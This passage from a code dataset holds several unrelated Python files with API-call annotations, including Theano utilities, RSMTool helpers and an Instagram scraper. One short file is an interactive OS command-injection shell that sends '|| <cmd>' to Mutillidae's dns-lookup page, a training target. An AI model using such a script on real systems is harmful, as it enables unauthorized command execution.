8533), False, 'from blocks.roles import add_role, COST\n'), ((9191, 9246), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._state_names'], {'must_have': '(False)'}), '(kwargs, self._state_names, must_have=False)\n', (9202, 9246), False, 'from blocks.utils import dict_union, dict_subset\n'), ((9329, 9386), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._context_names'], {'must_have': '(False)'}), '(kwargs, self._context_names, must_have=False)\n', (9340, 9386), False, 'from blocks.utils import dict_union, dict_subset\n'), ((10203, 10230), 'theano.tensor.roll', 'tensor.roll', (['feedback', '(1)', '(0)'], {}), '(feedback, 1, 0)\n', (10214, 10230), False, 'from theano import tensor\n'), ((11506, 11544), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._state_names'], {}), '(kwargs, self._state_names)\n', (11517, 11544), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11627, 11684), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._context_names'], {'must_have': '(False)'}), '(kwargs, self._context_names, must_have=False)\n', (11638, 11684), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11704, 11744), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._glimpse_names'], {}), '(kwargs, self._glimpse_names)\n', (11715, 11744), False, 'from blocks.utils import dict_union, dict_subset\n'), ((23557, 23583), 'theano.tensor.zeros_like', 'tensor.zeros_like', (['outputs'], {}), '(outputs)\n', (23574, 23583), False, 'from theano import tensor\n'), ((23660, 23704), 'theano.tensor.zeros', 'tensor.zeros', (['(batch_size, self.readout_dim)'], {}), '((batch_size, self.readout_dim))\n', (23672, 23704), False, 'from theano import tensor\n'), ((24308, 24329), 'blocks.bricks.NDimensionalSoftmax', 'NDimensionalSoftmax', ([], {}), '()\n', (24327, 24329), False, 'from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax\n'), ((26422, 26460), 'blocks.bricks.lookup.LookupTable', 
'LookupTable', (['num_outputs', 'feedback_dim'], {}), '(num_outputs, feedback_dim)\n', (26433, 26460), False, 'from blocks.bricks.lookup import LookupTable\n'), ((19221, 19289), 'blocks.bricks.parallel.Merge', 'Merge', ([], {'input_names': "kwargs['source_names']", 'prototype': 'merge_prototype'}), "(input_names=kwargs['source_names'], prototype=merge_prototype)\n", (19226, 19289), False, 'from blocks.bricks.parallel import Fork, Merge\n'), ((19368, 19399), 'blocks.bricks.Bias', 'Bias', ([], {'dim': "kwargs['readout_dim']"}), "(dim=kwargs['readout_dim'])\n", (19372, 19399), False, 'from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax\n'), ((25336, 25377), 'theano.tensor.ones', 'tensor.ones', (['(batch_size,)'], {'dtype': '"""int64"""'}), "((batch_size,), dtype='int64')\n", (25347, 25377), False, 'from theano import tensor\n'), ((30437, 30456), 'blocks.bricks.parallel.Fork', 'Fork', (['normal_inputs'], {}), '(normal_inputs)\n', (30441, 30456), False, 'from blocks.bricks.parallel import Fork, Merge\n'), ((30505, 30596), 'blocks.bricks.attention.AttentionRecurrent', 'AttentionRecurrent', (['transition', 'attention'], {'add_contexts': 'add_contexts', 'name': '"""att_trans"""'}), "(transition, attention, add_contexts=add_contexts, name=\n 'att_trans')\n", (30523, 30596), False, 'from blocks.bricks.attention import AbstractAttentionRecurrent, AttentionRecurrent\n'), ((9651, 9687), 'blocks.utils.dict_union', 'dict_union', (['inputs', 'states', 'contexts'], {}), '(inputs, states, contexts)\n', (9661, 9687), False, 'from blocks.utils import dict_union, dict_subset\n'), ((10448, 10486), 'blocks.utils.dict_union', 'dict_union', (['states', 'glimpses', 'contexts'], {}), '(states, glimpses, contexts)\n', (10458, 10486), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11829, 11867), 'blocks.utils.dict_union', 'dict_union', (['states', 'glimpses', 'contexts'], {}), '(states, glimpses, contexts)\n', (11839, 11867), False, 'from blocks.utils 
import dict_union, dict_subset\n'), ((11982, 12025), 'blocks.utils.dict_union', 'dict_union', (['states', 'next_glimpses', 'contexts'], {}), '(states, next_glimpses, contexts)\n', (11992, 12025), False, 'from blocks.utils import dict_union, dict_subset\n'), ((12443, 12499), 'blocks.utils.dict_union', 'dict_union', (['next_inputs', 'states', 'next_glimpses', 'contexts'], {}), '(next_inputs, states, next_glimpses, contexts)\n', (12453, 12499), False, 'from blocks.utils import dict_union, dict_subset\n')] |
import pandas as pd
from my_mod import enlarge
# Demo: greet, show a tiny DataFrame, then run the enlarge() helper.
print("Hello!")
frame = pd.DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]})
print(frame.head())
value = 11
print(enlarge(value))
"pandas.DataFrame",
"my_mod.enlarge"
] | [((70, 116), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [1, 2, 3], 'b': [4, 5, 6]}"], {}), "({'a': [1, 2, 3], 'b': [4, 5, 6]})\n", (82, 116), True, 'import pandas as pd\n'), ((143, 153), 'my_mod.enlarge', 'enlarge', (['x'], {}), '(x)\n', (150, 153), False, 'from my_mod import enlarge\n')] |
#-*-coding: utf-8-*-
from requests import session
from bs4 import BeautifulSoup
# IP address of the target machine.
host = "192.168.1.167"
# Path to Mutillidae's dns-lookup.php page.
route = "/mutillidae/index.php?page=dns-lookup.php"
with session() as s:
    while True:
        cmd = input(">>")
        # Bug fix: the original loop only tested the condition at the top,
        # so the literal "exit" command was still POSTed to the target once
        # before the loop terminated. Break before sending anything.
        if cmd == 'exit':
            break
        # "|| <cmd>" makes the vulnerable page run <cmd> after the DNS
        # lookup -- classic OS command injection.
        payload = "|| {}".format(cmd)
        # Send the payload to the host via a POST request.
        response = s.post("http://{}{}".format(host, route),
                          data={"target_host": payload})
        # Parse the response with Beautiful Soup.
        soup = BeautifulSoup(response.text, "html.parser")
        # The command output is inside a <pre> with class 'report-header',
        # so ask Beautiful Soup to find it and return its text.
        command_output = soup.find_all(
            "pre", attrs={"class": "report-header"})[0].get_text()
        # Print the command output.
        print(command_output)
"bs4.BeautifulSoup",
"requests.session"
] | [((238, 247), 'requests.session', 'session', ([], {}), '()\n', (245, 247), False, 'from requests import session\n'), ((538, 581), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (551, 581), False, 'from bs4 import BeautifulSoup\n')] |
"""
Utility classes and functions for RSMTool file management.
:author: <NAME> (<EMAIL>)
:author: <NAME> (<EMAIL>)
:author: <NAME> (<EMAIL>)
:organization: ETS
"""
import json
import re
from glob import glob
from pathlib import Path
from os.path import join
from .constants import POSSIBLE_EXTENSIONS
def parse_json_with_comments(pathlike):
"""
Parse a JSON file after removing any comments.
Comments can use either ``//`` for single-line
comments or or ``/* ... */`` for multi-line comments.
The input filepath can be a string or ``pathlib.Path``.
Parameters
----------
filename : str or os.PathLike
Path to the input JSON file either as a string
or as a ``pathlib.Path`` object.
Returns
-------
obj : dict
JSON object representing the input file.
Note
----
This code was adapted from:
https://web.archive.org/web/20150520154859/http://www.lifl.fr/~riquetd/parse-a-json-file-with-comments.html
"""
# Regular expression to identify comments
comment_re = re.compile(r'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE)
# if we passed in a string, convert it to a Path
if isinstance(pathlike, str):
pathlike = Path(pathlike)
with open(pathlike, 'r') as file_buff:
content = ''.join(file_buff.readlines())
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
# Return JSON object
config = json.loads(content)
return config
def has_files_with_extension(directory, ext):
"""
Check if the directory has any files with the given extension.
Parameters
----------
directory : str
The path to the directory where output is located.
ext : str
The the given extension.
Returns
-------
bool
True if directory contains files with given extension,
else False.
"""
files_with_extension = glob(join(directory, '*.{}'.format(ext)))
return len(files_with_extension) > 0
def get_output_directory_extension(directory, experiment_id):
"""
Check the output directory to determine what file extensions
exist. If more than one extension (in the possible list of
extensions) exists, then raise a ValueError. Otherwise,
return the one file extension. If no extensions can be found, then
`csv` will be returned by default.
Possible extensions include: `csv`, `tsv`, `xlsx`. Files in the
directory with none of these extensions will be ignored.
Parameters
----------
directory : str
The path to the directory where output is located.
experiment_id : str
The ID of the experiment.
Returns
-------
extension : {'csv', 'tsv', 'xlsx'}
The extension that output files in this directory
end with.
Raises
------
ValueError
If any files in the directory have different extensions,
and are in the list of possible output extensions.
"""
extension = 'csv'
extensions_identified = {ext for ext in POSSIBLE_EXTENSIONS
if has_files_with_extension(directory, ext)}
if len(extensions_identified) > 1:
raise ValueError('Some of the files in the experiment output directory (`{}`) '
'for `{}` have different extensions. All files in this directory '
'must have the same extension. The following extensions were '
'identified : {}'.format(directory,
experiment_id,
', '.join(extensions_identified)))
elif len(extensions_identified) == 1:
extension = list(extensions_identified)[0]
return extension
| [
"json.loads",
"pathlib.Path",
"re.compile"
] | [((1062, 1161), 're.compile', 're.compile', (['"""(^)?[^\\\\S\\\\n]*/(?:\\\\*(.*?)\\\\*/[^\\\\S\\\\n]*|/[^\\\\n]*)($)?"""', '(re.DOTALL | re.MULTILINE)'], {}), "('(^)?[^\\\\S\\\\n]*/(?:\\\\*(.*?)\\\\*/[^\\\\S\\\\n]*|/[^\\\\n]*)($)?', re.\n DOTALL | re.MULTILINE)\n", (1072, 1161), False, 'import re\n'), ((1286, 1300), 'pathlib.Path', 'Path', (['pathlike'], {}), '(pathlike)\n', (1290, 1300), False, 'from pathlib import Path\n'), ((1689, 1708), 'json.loads', 'json.loads', (['content'], {}), '(content)\n', (1699, 1708), False, 'import json\n')] |
import random
def go_to_sleep(text):
replies = ['See you later!', 'Just call my name and I\'ll be there!']
return (random.choice(replies))
quit()
| [
"random.choice"
] | [((125, 147), 'random.choice', 'random.choice', (['replies'], {}), '(replies)\n', (138, 147), False, 'import random\n')] |
import logging
from django.contrib.messages import get_messages
from django.utils.encoding import force_str
logger = logging.getLogger('django_sso_app')
def get_request_messages_string(request):
"""
Serializes django messages
:param request:
:return:
"""
storage = get_messages(request)
_messages = []
for message in storage:
_messages.append(force_str(message))
return ', '.join(_messages)
| [
"logging.getLogger",
"django.contrib.messages.get_messages",
"django.utils.encoding.force_str"
] | [((119, 154), 'logging.getLogger', 'logging.getLogger', (['"""django_sso_app"""'], {}), "('django_sso_app')\n", (136, 154), False, 'import logging\n'), ((294, 315), 'django.contrib.messages.get_messages', 'get_messages', (['request'], {}), '(request)\n', (306, 315), False, 'from django.contrib.messages import get_messages\n'), ((388, 406), 'django.utils.encoding.force_str', 'force_str', (['message'], {}), '(message)\n', (397, 406), False, 'from django.utils.encoding import force_str\n')] |
"""
This module contains functions related to integer formatting and math.
"""
from functools import reduce
from itertools import count
from math import gcd, prod
# ================ ARRAY FORMATTING FUNCTIONS ================
def str_array_to_int(intarray):
return int(''.join(intarray))
def int_array_to_int(intarray):
return str_array_to_int(map(str, intarray))
def int_to_int_array(num):
"""
Deprecated, use int_to_digit_array(num)
"""
return [int(str(num)[a]) for a in range(len(str(num)))]
def int_to_str_array(num):
return [str(num)[a] for a in range(len(str(num)))]
def int_to_digit_array(num):
return [int(str(num)[a]) for a in range(len(str(num)))]
# ================ CALCULATION FUNCTIONS ================
def product(numlist):
"""
Deprecated since Python 3.8, use math.prod instead
Also remove functools.reduce
"""
return reduce(lambda x, y: x * y, numlist, 1)
def factorial(num):
return prod(list(range(1, num + 1)))
def nCr(n, r):
return int(prod(range(n-r+1, n+1)) / prod(range(1, r+1)))
def phi(n):
"""
Returns the value of ϕ(n), or the Euler Totient function.
"""
return len([x for x in range(1, n) if gcd(n, x) == 1])
# ================ COUNTING FUNCTIONS ================
def counting_summations(values, target):
"""
Returns the number of ways to write target as the sum of numbers in values.
"""
csums = [[0 for _ in values]]
while len(csums) <= target:
tempsum = [0 for _ in values]
for a in range(len(values)):
if values[a] > len(csums):
break
elif values[a] == len(csums):
tempsum[a] = 1
else:
tempsum[a] += sum(csums[len(csums) - values[a]][:a+1])
csums.append(tempsum)
return sum(csums[target])
def partition():
"""
Calculates the partition function using Euler's method.
Much faster than the above function.
"""
yield 1
p = [1]
for i in count(1):
new_p = 0
for j in count(1):
# move i
if j % 2 == 0:
i -= j // 2
else:
i -= j
if i < 0:
break
# add to new_p
if (j - 1) % 4 < 2:
new_p += p[i]
else:
new_p -= p[i]
p.append(new_p)
yield new_p
| [
"functools.reduce",
"math.gcd",
"itertools.count"
] | [((900, 938), 'functools.reduce', 'reduce', (['(lambda x, y: x * y)', 'numlist', '(1)'], {}), '(lambda x, y: x * y, numlist, 1)\n', (906, 938), False, 'from functools import reduce\n'), ((2024, 2032), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (2029, 2032), False, 'from itertools import count\n'), ((2069, 2077), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (2074, 2077), False, 'from itertools import count\n'), ((1215, 1224), 'math.gcd', 'gcd', (['n', 'x'], {}), '(n, x)\n', (1218, 1224), False, 'from math import gcd, prod\n')] |
# -*- coding: utf-8 -*-
import random
from datetime import datetime
from operator import itemgetter
import requests
import time
from pyinstagram.model import Media
from .exceptions import OAuthException, PyInstagramException
from .oauth import OAuth
from .constants import API_URL
from .utils import DESAdapter
class InstagramApiClient(object):
"""
Classe base per le chiamate all'API ufficiale!
"""
def __init__(self, access_token=None):
self.access_token = access_token
if isinstance(access_token, OAuth):
self.access_token = access_token.access_token
if not self.access_token:
# TODO: Gestire il caso in cui l'access token scada
raise OAuthException("Per usare la libreria devi prima autenticarti!")
@staticmethod
def go_to_sleep(seconds=3600):
"""
Questo metodo viene chiamato quando è stato raggiunto il
limite consentito dall'API, se succede metto in pausa il
programma per un'ora.
:param seconds: int - Numero di secondi di attesa
:return: None
"""
time.sleep(seconds)
def _make_request(self, uri, method='get', data=None):
"""
Metodo che effettua la richiesta alle API Instagram.
:param uri: str - L'Uri da chiamare
:param method: str - metodo http con cui fare la richiesta
:param data: dict - dizionario con i dati da passare nella richiesta
:return: list - lista di dati di risposta
"""
next_url = "" # per la paginazione
res = []
retry = 1 # serve per ripetere la chiamata dopo un ora se supero il limite di richieste
while retry:
res = getattr(requests, method)(uri, data=data)
res, next_url = self._handle_response(res)
if res == 0:
# la chiamata non è andata a buon fine perchè ho raggiunto il limite di chiamate
# ho già aspettato un'ora, adesso ci riprovo.
continue
retry = 0
return res, next_url
def _handle_response(self, request):
"""
Una volta effettuata la chiamata, ci occupiamo di
interpretarne la risposta.
Se la richiesta è andata a buon fine, restituiamo la
lista dei dati, altrimenti o mettiamo in pausa il
programma (se abbiamo raggiunto il limite dell'API)
o solleviamo un'eccezione appropriata.
:param request: requests - la risposta della chiamata
:return: list - lista dei dati ricevuti
"""
if request.status_code == 200:
# Tutto ok!
try:
res = request.json()
except Exception:
raise Exception(request.text)
else:
data = res['data']
next_url = res.get('pagination', {}).get('next_url')
return data, next_url
elif request.status_code == 429:
# OAuthRateLimitException
self.go_to_sleep()
return 0
elif request.status_code == 400:
raise OAuthException(request.json()['meta']['error_message'])
elif "<!DOCTYPE html>" in request.text:
raise PyInstagramException("Page not found")
else:
raise PyInstagramException
def get_by_user(self, id_user=None, count=0):
"""
Metodo usato per cercare gli ultimi post di un utente.
Se non viene passato il paramentro id_user, chiederemo
i post dell'utente che ha autorizzato l'app.
:param id_user: str - post dell'utente da cercare
:param count: int - limita a {count} risultati
:return: list - lista dati
"""
all_media = []
id_user = id_user or "self"
url = API_URL + "users/{0}/media/recent/?access_token={1}".format(id_user, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
if len(all_media) > count:
return all_media[:count]
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media[:count]
def get_by_hashtag(self, tags=(), count=0):
"""
Metodo usato per cercare i post con uno o più hashtag.
:param tags: iterable - gli hashtag da cercare
:param count: int - massimo numero di risultati da restituire
:return: list - lista di dati
"""
if isinstance(tags, str):
tags = (tags, )
all_media = []
for tag in tags:
url = API_URL + "tags/{0}/media/recent?access_token={1}".format(tag, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media
def search_for_tag(self, tag, count=3):
"""
Metodo usato per cercare hashtag simili a un altro.
:param tag: str - hashtag da cercare
:param count: int - limita a un numero di hashtag
:return: dict
"""
url = API_URL + "tags/search?q={0}&access_token={1}".format(tag, self.access_token)
res, _ = self._make_request(url)
res = sorted(res, key=itemgetter('media_count'))
names = {r['name']: r['media_count'] for r in res[:count]}
return names
class InstagramJsonClient(object):
"""
Classe per fare semplici richieste in get senza usare access token
o le API ufficiali. Fa largo uso di url con query string.
"""
def __init__(self):
self.base_url = "https://www.instagram.com/"
self.session = self._init_session()
def _init_session(self):
"""Abilita il supporto 3DES su Instagram"""
s = requests.Session()
s.mount(self.base_url, DESAdapter())
return s
def get_user_info(self, user):
"""
Ritorna le informazioni di un utente
:param user: username Instagram
:return: dizionario con le info dell'utente
"""
base_url = "{base}{user}/?__a=1".format(
base=self.base_url,
user=user
)
res = self.session.get(base_url)
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(base_url))
return res.get('user', {})
def get_by_user(self, user, count=None, since=None, until=None):
"""
Ricerca post (pubblici) di un utente.
Gestisce automaticamente la paginazione.
Ritorna una lista di dizionari così composta:
[
{
id: "1606977067425770236_528817151",
code: "BZNISDyHKr8",
user: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
},
images: {
thumbnail: {
width: 150,
height: 150,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
low_resolution: {
width: 320,
height: 320,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s640x640/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
}
},
created_time: "1505786616",
caption: {
id: "17887172635109592",
text: "Look up in the sky tonight and see Saturn! This month Saturn is the only prominent evening planet low in the southwest sky. Look for it near the constellation Sagittarius. Above and below Saturn--from a dark sky--you can't miss the summer Milky Way spanning the sky from northeast to southwest! Grab a pair of binoculars and scan the teapot-shaped Sagittarius, where stars and some brighter clumps appear as steam from the teapot. Those bright clumps are near the center of our galaxy, which is full of gas, dust and stars. Credit: NASA #nasa #space #astronomy #september #whatsup #night #nightsky #stars #stargazing #saturn #planet",
created_time: "1505786616",
from: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
}
},
user_has_liked: false,
likes: {
data: [
{
id: "4010977557",
full_name: "Natalia",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/14482183_140565769737733_5249004653428867072_a.jpg",
username: "nata.barata"
},
{
id: "2055640911",
full_name: "<NAME>○cq ♡☆♡",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/13534211_1557747037863158_1773299287_a.jpg",
username: "melsab19"
},
{
id: "752521983",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10624147_809215025765686_985825156_a.jpg",
username: "lauriwushu"
},
{
id: "1719376530",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10985984_1575721159312127_239135761_a.jpg",
username: "julia_paniti"
}
],
count: 204038
},
comments: {
data: [
{
id: "17876620534138631",
text: "@jennytried ❤️",
created_time: "1505855823",
from: {
id: "4610349",
full_name: "",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10932285_747424172021124_1089839988_a.jpg",
username: "siskascherz"
}
},
{
id: "17899664473040297",
text: "@a.hm.ed.1",
created_time: "1505855825",
from: {
id: "416900232",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/16907969_415736022127336_8841431139366207488_a.jpg",
username: "maariam_bk"
}
},
{
id: "17871962107174729",
text: "Wonderful 😍",
created_time: "1505855872",
from: {
id: "2982243595",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/21690360_117321958944805_772082897589895168_n.jpg",
username: "smit_raj_"
}
}
],
count: 1564
},
can_view_comments: true,
can_delete_comments: false,
type: "video",
link: "https://www.instagram.com/p/BZNISDyHKr8/",
location: null,
alt_media_url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4",
videos: {
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4"
},
low_bandwidth: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
},
low_resolution: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
}
},
video_views: 1012473
},
]
:param user: str - username Instagram
:param count: int - limita il numero di risultati
:param since: str - Risultati a partire da questa data, es. "20170101000000"
:param until: str - Risultati entro questa data, es. "20171231235959"
:return:
"""
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
all_data = []
base_url = "{base}{user}?__a=1{{max}}".format(
base=self.base_url,
user=user
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
if not res.status_code == 200:
return all_data[:count]
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
for media_res in res['user']['media']['nodes']:
# Instagram non mi permette di cercare per data, però mi fornisce la
# data di creazione del post in formato Unix Timestamp. Quindi, per
# gestire il caso in cui volessi solo risultati in un certo intervallo,
# verifico che il mio post sia stato creato in questo lasso di tempo.
created_at = int(media_res['date'])
if since and created_at < time.mktime(since.timetuple()):
# sono andato troppo indietro, posso uscire
return all_data[:count]
if until and created_at > time.mktime(until.timetuple()):
continue
all_data.append(media_res)
if res['user']['media']['nodes'] and (not len(all_data) > count if count else True):
# ho oggetti, ne ho altri da scaricare, e non ho raggiunto il limite di risultati
try:
max_id = res['user']['media']['nodes'][-1]['id']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
# aspetto un po', index è vuoto e Instagram mi blocca il flusso
time.sleep(random.randint(10, 60))
else:
# tutto ok, ho altri dati da scaricare
continue
else:
# non ho dati, oppure ne ho di più di quelli voluti
break
return all_data[:count]
def get_by_hashtag(self, tags=(), count=1000000, top_posts=True, since=None, until=None):
"""
Ricerca per hashtag.
Gestisce automaticamente la paginazione.
Ritorna una lista di oggetti SqlAlchemy a partire da
una lista di dizionari fatti come segue:
[
{
comments_disabled: false,
id: "1607551655901147333",
dimensions: {
height: 640,
width: 640
},
owner: {
id: "981246989"
},
thumbnail_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
thumbnail_resources: [
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 150,
config_height: 150
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s240x240/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 240,
config_height: 240
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 320,
config_height: 320
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s480x480/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 480,
config_height: 480
}
],
is_video: false,
code: "BZPK7bAFDDF",
date: 1505855112,
display_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
caption: "<NAME> London Fashion Week Spring_Summer 2018 @londonfashionweek @britishfashioncouncil @tommyhilfiger #londonfashionweek#LFW#fashion#paris#fashionblogger#tehran#fashioneditor#fashionweek#style#streetstyle##milan#london#newyork#mfw#lfw#nyfw#vogue#gq#art#love#fashionshow#blogger#life#event#ss2018#instafashion#runway#fashionmoment0#TOMMYNOW",
comments: {
count: 1
},
likes: {
count: 24
}
},
]
:param tags: str or tuple - hashtag (senza il #) o tupla di hastag
:param count: int - limita i risultati
:param top_posts: bool - limita ai top posts altrimenti ritorna tutto
:param since: str - Risultati a partire da questa data, es. "20170101000000"
:param until: str - Risultati entro questa data, es. "20171231235959"
:return: list - lista di dizionari
"""
if isinstance(tags, str):
tags = (tags, )
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
mapper = {
'id': 'id',
'comments': 'edge_media_to_comment.count',
'unix_datetime': 'taken_at_timestamp',
'user': 'owner.id',
'likes': 'edge_liked_by.count',
'is_video': 'is_video',
'url': 'display_src',
'height': 'dimensions.height',
'width': 'dimensions.width',
'code': 'shortcode'
}
all_data = []
for tag in tags:
all_data_tag = []
base_url = "{base}explore/tags/{tag}?__a=1{{max}}".format(
base=self.base_url,
tag=tag
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
# Post rimosso o non più raggiungibile
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
res_media = res['graphql']['hashtag']['edge_hashtag_to_top_posts'] if top_posts else res['graphql']['hashtag']['edge_hashtag_to_media']
has_next_page = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['has_next_page']
# converto in oggetti SqlAlchemy
sqlalchemy_media = []
for element in res_media['edges']:
# Instagram non mi permette di cercare per data, però mi fornisce la
# data di creazione del post in formato Unix Timestamp. Quindi, per
# gestire il caso in cui volessi solo risultati in un certo intervallo,
# verifico che il mio post sia stato creato in questo lasso di tempo.
created_at = int(element['node']['taken_at_timestamp'])
if since and created_at < time.mktime(since.timetuple()):
# sono andato troppo indietro, posso uscire
break
if until and created_at > time.mktime(until.timetuple()):
continue
model = Media()
for field_to, getter in mapper.items():
path = getter.split('.')
val = element['node']
for key in path:
val = val.get(key, {})
if isinstance(val, dict):
val = None
setattr(model, field_to, val)
model.json = element['node']
model.caption = element['node']['edge_media_to_caption']['edges'][0]['node']['text']
sqlalchemy_media.append(model)
all_data_tag.extend(sqlalchemy_media)
if res_media['edges'] and has_next_page and not len(all_data_tag) > count and not top_posts:
try:
max_id = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
# aspetto un po', index è vuoto e Instagram mi blocca il flusso
time.sleep(random.randint(10, 60))
else:
# tutto ok, ho altri dati da scaricare
continue
else:
# non ho dati, oppure ne ho di più di quelli voluti
break
all_data.extend(all_data_tag)
return all_data[:count]
def get_by_media_codes(self, codes=(), all_comments=False):
"""
Restituisce una lista contenente i dati dei post richiesti
(identificati dalla stringa 'code' del post). Attivando
il flag all_comments, verranno fatte ulteriori richieste
gestendo la paginazione dei commenti. I commenti verranno
aggiunti al json originale in modo da avere alla fina una
lista composta da tanti elementi quanti sono i post
richiesti.
:param codes: stringa del codice o tupla con i codici dei post
:param all_comments: bool - se attivato, scarica tutti i commenti
:return: lista di json con i dati dei post richiesti
"""
if isinstance(codes, str):
codes = (codes,)
all_data = []
for code in codes:
url = "{base}p/{code}?__a=1".format(
base=self.base_url,
code=code
)
res = self.session.get(url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
# Post rimosso o non più raggiungibile
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(url))
if all_comments:
while True:
page_info = res['graphql']['shortcode_media']['edge_media_to_comment']['page_info']
if page_info['has_next_page']:
next_url = url + "&max_id={}".format(page_info['end_cursor'])
next_res = self.session.get(next_url)
next_res = next_res.json()
res_edges = res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
next_edges = next_res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
res_edges.extend(next_edges)
else:
break
all_data.append(res)
return all_data
| [
"requests.Session",
"datetime.datetime.strptime",
"time.sleep",
"operator.itemgetter",
"pyinstagram.model.Media",
"random.randint"
